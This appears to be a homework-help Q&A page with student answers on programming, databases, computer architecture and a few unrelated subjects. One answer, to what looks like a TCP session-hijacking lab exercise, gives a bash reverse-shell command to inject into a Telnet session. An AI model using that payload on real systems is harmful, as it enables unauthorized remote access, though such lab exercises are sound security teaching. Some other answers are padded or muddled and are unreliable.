What is the output when you run the following program? print(3 + 7) print("2 + 3") 10 2 + 3 3 + 7 5 3 + 7 2 + 3 10 5

Answers

Answer 1

Answer:

10

2 + 3

Explanation:

The statement ;

print(3 + 7) will give the output 10 ; by cause we are using the print command to display the result of the integer sum of 3 and 7 which is 10

The other statement print("2 + 3") will give the output 2 + 3. This is because by wrapping the statement within quotation marks, the programming language sees it as a string rather Than an integer on which a mathematical operation can be performed. Hence it prints what is written within the quotation marks.


Related Questions

what is a web client ​

Answers

Answer:

Web client:

it is an application(web browser,program etc ) that requests for service from a web server.

stay safe healthy and happy

Write a function NumberOfPennies() that returns the total number of pennies given a number of dollars and (optionally) a number of pennies. Ex: 5 dollars and 6 pennies returns 506.
Sample program:
#include
using namespace std;

int main() {
cout << NumberOfPennies(5, 6) << endl; // Should print 506
cout << NumberOfPennies(4) << endl; // Should print 400
return 0;

Answers

Answer:

Following are the code to the given question:

#include <iostream>//header file  

using namespace std;

int NumberOfPennies(int ND, int NP=0)//defining a method that accepts two parameters  

{

return (ND*100 +NP);//use return keyword that fist multiply by 100 then add the value  

}

int main() //main method

{

cout << NumberOfPennies(5,6) << endl; // Should print 506

cout << NumberOfPennies(4) << endl; // Should print 400

return 0;

}

Output:

506

400

Explanation:

In the method "NumberOfPennies" it accepts two parameters that are "ND and NP" that uses the return keyword that multiply 100 in ND variable and add in NP variable and return its values.

In the main method it it uses the cout method that call the by accepts value in parameter and print its value.

There is an active Telnet connection from a client (10.0.2.5) to a Telnet server(10.0.2.9). The server has just acknowledged a sequence number1000, and the client has just acknowledged a sequence number 3000. An attacker wants to launch the TCP session hijacking attack on the connection, so he can execute a command on the server. He is on the same local area network as these two computers. You need to construct a TCP packet for the attacker. Please fill in the following fields:
• Source IP and Destination IP
• Source port and Destination port
• Sequence number
• The TCP data field.

Answers

Answer:

Answer is mentioned below.

Explanation:

Source IP and Destination IP: 10.0.2.5, 10.0.2.9 Source port and Destination port: for source port, we need to sniffer a packet in this  Sequence number: 3001 The TCP data field: “/bin/bash –l > /dev/tcp/10.0.20/9090 2>&1 0<&1”

I hope you find the answer helpful. All the codes are correctly mentioned. Thanks

I wish we could visit Paris for the holidays into exclamatory​

Answers

Answer:

wdym

Explanation:

You want to visit Paris ? Tbh is sould fun and interesting

Holding all else constant a higher price for ski lift tickets would be expected to

Answers

Answer:

answer is below

Explanation:

decrease the number of skis sold

The following implementations of the method reverse are intended to reverse the o rder of the elements in a LinkedList.

I.
public static void reverse (LinkedList alist)( LinkedList temp = new LinkedList (); while (aList.size ()>0) temp.addLast (aList.removeFirst ) aList.addFirst (temp.removeFirst ) while (temp.size ()> o)
II.
public static void reverse (LinkedList alist) while (aList.size () >0) while (Itemp.isEmpty 0) QueuecSomeType> temp new LinkedList 0: temp.add (alist.removeFirst ()): aList.addFirst (temp.remove ():

IlI.
public static void reverse (LinkedList alist) while (aList.size ()>0) while (Itemp.isEmpty()) Stack temp new Stack ( temp.push (aList.removeLast ()) aList.addFirst (temp.pop ());

Which of the choices above perform the intended task successfully? Why?

a. I only
b. Il only
c. Ill only
d. Il and Ill only
e. I, ll, and IlI

Answers

Answer:

c. Ill only

Explanation:

All of the code snippets provided are missing small details such as brackets in the correct places and '=' to signal an assignment. These are crucial when coding in Java and the code will not run without it. Regardless, the only implementation that is correct in the options would be implementation III. It is the only code snippet that is correctly structured to reverse the order of the elements. It will still need debugging in order to get it to work.

IlI.

public static void reverse (LinkedList alist) while (aList.size ()>0) while (Itemp.isEmpty()) Stack temp new Stack ( temp.push (aList.removeLast ()) aList.addFirst (temp.pop ());

Explain why robots are better at some jobs than human workers are.

Answers

Answer:

Because humans have human minds meaning there are chances of errors, and or mistakes. and they do the same thing over and over with precise precision

Explanation:

hope this helps :)

A digital computer has a memory unit with 16 bits per word. The instruction set consists of 72 different operations. All instructions have an operation code part(opcode) and an address part(allowing for only one address). Each instruction is stored in one word of memory.

Required:
a. How many bits are needed for the opcode?
b. How many bits are left for the address part of the instruction?
c. What is the maximum allowable size for memory?
d. What is the largest unsigned binary number that can be accommodated in one word of memory?

Answers

Answer:

a. 7 bits b. 9 bits c. 1 kB d. 2¹⁶ - 1

Explanation:

a. How many bits are needed for the opcode?

Since there are 72 different operations, we require the number of bits that would contain 72 different operations. So, 2ⁿ ≥ 72

72 = 64 + 8 = 2⁶ + 8

Since n must be an integer value, the closest value of n that would contain 72 different operations is n = 7. So, 2⁷ = 128

So, we require 7 bits for the opcode.

b. How many bits are left for the address part of the instruction?

bits left = bits per word - opcode bit = 16 - 7 = 9 bits

c. What is the maximum allowable size for memory?

Since there are going to be 2⁹ bits to addresses each word and 16 bits  for each word, the maximum allowable size for memory is thus 2⁹ × 16 = 512 × 16 = 8192 bits.

We convert this to bytes

8192 bits × 1 byte/8 bits = 1024 bytes = 1 kB

d. What is the largest unsigned binary number that can be accommodated in one word of memory?

Since the number go from 0 to 2¹⁶, the largest unsigned binary number that can be accommodated in one word of memory is thus

2¹⁶ - 1

Character positions in
arrays start counting with
the number 1.
True
False

Answers

Answer:

False.

Explanation:

A data dictionary can be defined as a centralized collection of information on a specific data such as attributes, names, fields and definitions that are being used in a computer database system.

In a data dictionary, data elements are combined into records, which are meaningful combinations of data elements that are included in data flows or retained in data stores.

This ultimately implies that, a data dictionary found in a computer database system typically contains the records about all the data elements (objects) such as data relationships with other elements, ownership, type, size, primary keys etc. This records are stored and communicated to other data when required or needed.

In Computer programming, an array can be defined as data structure which comprises of a fixed-size collection of variables each typically holding a piece of data and belonging to the same data type such as strings or integers.

This ultimately implies that, when a programmer wishes to store a group of related data (elements) of the same type, he or she should use an array.

Generally, character positions in arrays start counting with the number 0 not 1.

Hence, an array uses a zero-based indexing and as such the numbering or position of the characters (elements) starts from number 0. Thus, the first character (element) in an array occupies position zero (0), the second number one (1), the third number two (2) and so on.

melissa created a brochure for fashion fabrics with this image. wich design elements are significant in this image

Answers

Answer:

Texture is very prominent in the image. The other elements are

_Shape_ and _Color_.

Explanation:

If we were to look through our choices, space doesn't make sense as there is no clear distinction between foreground, middle ground, and background. It's not form because the image shown shows no manipulation of light that would make the subject of the image look realistic.

- 2021 Edmentum

Texture stands extremely prominent in the image. The other features exist

Shape and Color.

What are the significant elements in the image?

Texture stands extremely prominent in the image. The other features exist

Shape and Color.

If we were to look through our choices, space doesn't create sense as there exists no clear difference between foreground, central ground, and background. It's not constituted because the picture shown delivers no manipulation of light that would cause the subject of the picture to look realistic.

According to each line style (fiber, natural fiber, cotton, recycled plastic, silk), you can design various clothes and styles. Harmony happens when the overall design, garment, or ensemble performs visible unity.

To learn more about significant elements in the image

https://brainly.com/question/13581860

#SPJ2

What does the following code print?
public class { public static void main(String[] args) { int x=5 ,y = 10; if (x>5 && y>=2) System.out.println("Class 1"); else if (x<14 || y>5) System.out.println(" Class 2"); else System.out.println(" Class 3"); }// end of main } // end of class.

Answers

Answer:

It throws an error.

the public class needs a name.

like this:

public class G{ public static void main(String[] args) {

   int x=5 , y = 10;

   if (x>5 && y>=2) System.out.println("Class 1");

   else if (x<14 || y>5) System.out.println(" Class 2");

   else System.out.println(" Class 3"); }// end of main

   }

if you give the class a name and format it, you get:

Class 2

Explanation:

An argument does not always have to be made in words. A piece of music
can make an argument; however, the argument is usually a(n)
one.
A. unfocused
B. emotional
C. credible
D. logical

Answers

Answer:

B. emotional

Explanation:

An emotional argument. An argument does not always have to be made in words.

The piece of music that can make an argument is usually an emotional argument. Thus option B is correct.

What is an emotional argument?

An emotional argument is an e that is made in words and expresses its deals in terms of feelings and thoughts. The emotional argument is characterized by the manipulation of the recipient's emotions and has an absence of factual evidence.

Find out more information about the argument.

brainly.com/question/3775579

2. List the differences between personal
computer operating systems and mainframe
operating systems.

Answers

Explanation:

Mainframes typically run on large boxes with many processors and tons of storage, as well as high-bandwidth busses. PCs are desktop or mobile devices with a single multi-core processor and typically less than 32GB of memory and a few TBs of disk space. Second, a mainframe OS usually supports many simultaneous users.

A database designer wants to create three tables: Supplier, Product, and Country. The Supplier table has a Countryld column with values that must appear in the Country table's Countryld column. The Product table has an auto-increment column.
Which table's CREATE TABLE statement(s) must specify a FOREIGN KEY?
a. Supplier
b. Product
c. Country
d. Supplier and Country

Answers

Answer:

(a) Supplier

Explanation:

In database design, two tables are linked together using a FOREIGN KEY. A foreign key is formed from one or more columns of one table that reference or match another key (often called a primary key) in another table. In other words, when a column or a combination of columns on one table points to a primary key of another table, the column(s) will specify the foreign key.

PS: A primary key is used to make each entry of a table unique.

In the given tables - Supplier, Product, Country -  since the Supplier table has a column called CountryId referencing the CountryId column of the Country table, then CountryId is a primary key in Country table but a foreign key in Supplier table.

Therefore, the CREATE TABLE statement(s) of the Supplier table must specify a foreign key.

A database management system often reads and writes data in a database, and makes sure there is consistency and availability. The supplier table's CREATE TABLE statement(s) must specify a FOREIGN KEY.

The database system often guards data when a lot of transactions is taking place.   it often hinders multiple transactions with the same data at the same time.

The Select SQL statement does not alter any database data. A supplier database is made up of different list of service, product or materials providers who can meet orders quickly.

Learn more from

https://brainly.com/question/15281828

Which type of query enables a user to move, append, or update matching records in a table?
action query
select query
static query
parameter query

Answers

Answer:

the query that allows these things is called an action query

Answer:

The answer is A-action query just finshed the review on edg 2021

Explanation:

Another method that might be desired is one that updates the Goalie's jerseyNumber. This method will receive a new number of Jersey and set this number to the Goalie's current jerseyNumber. What methods would accomplish this?

Answers

Answer:

A setter method

Explanation:

A setter method will accomplish this. A setter method is a method that takes in a value as an argument and grabs an object's instance variable and modifies it with the value passed as an argument. In this scenario, the argument value would be the current JerseyNumber. The setter method will grab the object's jerseyNumber variable and change its value to be the value of the passed argument. Setter methods are common practice in all object classes as well as the getter methods to retrieve instance variables.

Why is it best to serve cheese with plain breads or crackers?

Answers

Answer:Here's why it works: Club crackers are engineered to be the perfect amount of buttery and salty, which means that, sometimes, they're all you can taste if paired with the wrong cheese.

Explanation:

Newton's method has the advantage of having a faster quadratic convergence rate over the other methods such as Secant and bisection methods.

a. True
b. False

Answers

Answer:

a. True

Explanation:

The Newton's method (Newton-Raphson method) used in advanced statistical computing can be used for a continuous and differentiable function that can be approximated by a straight line tangent to it. It requires the derivative of the function to be known, Newton's method converges faster that is whenever it converges. Newton Raphson Method has quadratic convergence which is faster, and the quadratic convergence makes the error in the next iteration increase by the square of the value of the previous iteration.

Suppose data is available for an on-line music distributor. This data includes: song title, artist performing the song, date song purchased, amount charged for the song. Using only the information available in the distributor's data (song title, artist performing, date purchased, amount charged), which of the following can be determined using database or spreadsheet software?

a. The number of songs by a particular artist that were purchased on a given date.
b. The amount of money charged on the first day of any given month.
c. Whether the amount charged is the same for each song title.

Answers

Answer:

The answer is "Option a".

Explanation:

In this question, the only choice "a" is correct because in the question it is declared that it includes: your track title, the performance artist, the date their track is bought, the fee for the track. Its number of music purchased by a given artist on a particular date is based only on details available on the distributor's song title, performing, date purchased, the sum paid.

Which of these is a good thing to consider when naming variables?
The name should be readable and make sense
Keep it short, less typing
Use only letters
O Sentences are Tood variable names.

Answers

Answer:

The name should be readable and make sense

Explanation:

Aside the rules involved in naming variables, there are also some good tips which should be considwred when given names to our variables. These means there are some variables which are acceptable by our program but may be avoided in other to make our codes easier to read by us and others and it also makes debugging easier when we run into errors. Using short variables are acceptable on code writing as far as the rules are followed. However, it is more advisable to use names that are descriptive and readable such that it relates to the program or code being worked on. This ensures that we and others can follow through our lines of code at a much later time without making mistakes or forgetting what the variable stands for.

The moment that S-locks are released will determine:__________

a. The granularity of locks
b. The compliance with ACID
c. The look-ahead logging strategy
d. The anomalies that can happen

Answers

Answer:

A.

Explanation:

In computer science, the selection of a lockable device is an essential consideration in the creation of a database management system.

Granularity locking is a locking technique that is applied in database management systems (DBMS) as well as relational databases. The granularity of locks corresponds to how much data is locked at once, and it is determined when S lock (Shared Locks) are released.

The moment that S-locks are released will determine the granularity of locks (Option a).

A lock can be defined as a procedure capable of enforcing limits on access to a particular resource when there exist many threads of execution.

Multiple granularity locking (abbreviated as MGL) is a locking strategy employed in database management systems and also in relational databases.

This strategy (multiple granularity locking) is often used in order to ensure serializability.

In conclusion, the moment that S-locks are released will determine the granularity of locks (Option a).

Learn more in:

https://brainly.com/question/15691389

what is the different between information and data

Answers

Answer:

Information is the act of imparting knowledge and data is the recorded observation that are usually presented in a structured format

Code in Python

Write a while loop that prints user_num divided by 2 until user_num is less than 1. The value of user_num changes inside of the loop.

Sample output with input: 20
10.0
5.0
2.5
1.25
0.625


Note: If the submitted code has an infinite loop, the system will stop running the code after a few seconds and report "Program end never reached." The system doesn't print the test case that caused the reported message.

My code, it only passes one test with correct outputs
what am I forgetting?

Answers

You're setting the value of user_num to 20. Doing this won't allow the other test cases to run. Simply delete that line and your code should work. This is the code I wrote:

user_num = int(input())

while user_num>=1:

   user_num/=2

   print(user_num)

I wrote my code in python 3.8. I hope this helps.

In the following cell, we've loaded the text of Pride and Prejudice by Jane Austen, split it into individual words, and stored these words in an array p_and_p_words. Using a for loop, assign longer_than_five to the number of words in the novel that are more than 5 letters long. Hint: You can find the number of letters in a word with the len function.

Answers

Answer:

Explanation:

Since the array is not provided, I created a Python function that takes in the array and loops through it counting all of the words that are longer than 5. Then it returns the variable longer_than_five. To test this function I created an array of words based on the synapse of Pride and Prejudice. The output can be seen in the attached picture below.

def countWords(p_and_p_words):

   longer_than_five = 0

   for word in p_and_p_words:

       if len(word) > 5:

           longer_than_five += 1

   return longer_than_five

Identify the logic error in the code below. The code is supposed to display a single message “child”, “adult” or “senior” for any value of age:

if (age < 18) {
System.out.println("child");
} else if (age >= 18) {
System.out.println("adult");
} else if (age > 65) {
System.out.println("senior");
}
Question 1 options:

a)

no message for age = 65

b)

too many messages for age = 18

c)

no message for age < 65

d)

message “senior” will never be displayed

Answers

If we take a look at the first else if block, the code runs whenever the age is greater than or equal to 18. This means that senior will never be displayed. Answer choice D is correct.

to copy and paste the image in MS Word the dash option is used​

Answers

ur answer hope this will helps u

Let ∑ = {a,b}, and let L be the language over ∑:
L ={ w € ∑+ |w is even, and w contains at least one a in the first half and exactly one b in the second half }
Give a context-free grammar (CFG) for L, and briefly explain how it works to correctly represent the language. There are no additional requirements for your solution other than what is stated here, except the usual guidance to make sure your answer is clear and understandable and avoids too much unnecessary complexity. In particular, there is no credit for the grammar being unambiguous (if possible.)

Answers

Answer:

Explanation:

From the information given, By applying a CFG for L:

Because each state generates two symbols or null, the length will be equal and even.

1st Condition:

throughout the first half, at least one (a)

2nd:

exactly one (b) within the second half

Dear Student, there is a technical error that occurred when submitting this question. This makes us unable to submit the complete solution to the question but curb that effect, we've attached an image below that shows the complete algorithm and a detailed explanation of the question.

Best Regards.

how do you design and create video games for what console game That you want To have it in

Answers

Answer

Making a video game is much less daunting than it might seem. While you likely aren’t going to go from having no experience to making the next Grand Theft Auto, it has actually never been easier to get started making games. Game development tools and resources have become increasingly accessible to the average person, even if they have no programming experience. Often these tools are also available for free.

To try to make things easier for those looking to get started making games, we’ve put together a list of 11 game engines / editors. Some are designed for a specific genre of game or to be incredibly easy for newcomers. Others are professional development tools for AAA games, but are effectively free to use for hobbyists and still offer a lot of learning tools to help those with limited programming experience get started.

There are, of course, a lot of things that go into game development — music, animation, sound, writing, texturing, modeling, etc. — however, the game engine / editor you choose is going to have the biggest effect on what kind of game you can make. If you have suggestions for other engines, software, or learning tools for the other aspects of development, post it in the comments.

what is the mean of debugging​

Answers

Answer:

the process of identifying and removing errors from computer hardware or software

Explanation:

Essentially just fixing programming errors, mainly in coding or software

Construct a SQL query that displays a list of colleges, their sity/state, the accrediting agency, and whether or not the school is distance only. Only show the first 10 records.

Answers

Answer:

SELECT college, city_state, accre_agency, distance LIMIT 10

Explanation:

Given

Table name: College

See attachment for table

Required

Retrieve top 10 college, state, agency and school distance from the table

To retrieve from a table, we make use of the SELECT query

The select statement is then followed by the columns to be selected (separated by comma (,))

So, we have:

SELECT college, city_state, accre_agency, distance

From the question, we are to select only first 10 records.

This is achieved using the LIMIT clause

i.e. LIMIT 10 for first 10

So, the complete query is:

SELECT college, city_state, accre_agency, distance LIMIT 10

Other Questions
Lesson 17 Conservation of Momentum grade 9 I want the answer. Kari lost 2.88 kilograms after two weeks of exercise. One kilogram is equal to approximately 2.2 pounds. Which measurement is closest to the number of pounds that Kari lost? I really really really really really really really really really need help with this!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! The diameter of a circle is 19 ft. Find the circumference to the nearest tenth. finally the value of the expression 20m+30m+40 where m=4 How does the Sun transfer its energy to areas A and B?Which statement compares how much heat is absorbed by areas A and B?Which statement compares the temperatures of areas A and B? 1) Bruce L. Sprouts had to take a loan worth $5,000.The loan has a 3.5% interest rate.He has to pay the loan off in 6 years.A) How much will he have to pay for the interest?B) How much will he have to pay total? Please answer fast show your work you will be marked as brain Read the following scene description:Amy, an arrogant teenage girl, and her best friend arecompeting in a small-town beauty pageant. Amy watchesherself in the mirror backstage and decides to sabotageher friend's chances in the pageant by hiding her friend'spageant dress, causing a last-minute panic. Amy wins thepageant. Backstage, she turns to the mirror to brush herhair, but the mirror is broken.Which statement most clearly describes the symbolism in this scene?A. Amy is secretly ashamed of her poor behavior.B. Amy suffers from insecurity, causing her to lash out at her friend.O C. The broken mirror represents Amy's betrayal of her own goodnature.D. The dress stands for the beauty Amy longs to have. (PLEASE HELP !! )Does the chemical equation follow the Law of Conservation Of Matter?A. NoB. YesPlease explain to. Which of the following has a mass of 10.0 g?a 2.02 mol Neb 0.119 mol KrC 1.25 mol Hed 0.400 mol Ar If you have an object that takes up 4 cubic centimeters of space and has a mass of 2g, what is the density of that object? What percent of all farms in the US are small family farms? A. 30% B. 50% C. 70% D. 90% Please select the best answer from the choices provided. A B C D The lengths of the sides of a triangle are 12, 16, and 20. Classify the triangle as acute, right, or obtuse. Is this question a statistical question or a non statistical question: If Iasked you, is pizza your favorite food. *A.StatisticalB.Non statistical urgent pls help !!! triangle xyz is shown below A paragraph about What were some problems that arose during the Gilded Ages in America? What made President Abraham Lincoln decide to emancipate African Americans?no links and scams or your account will be reported please help i will give decent points if right A _____________ is a numerical descriptive measure of a sample. It is calculated from the observations in the sample. x divided by 60 times 10 = ?find the answershow stepsfind x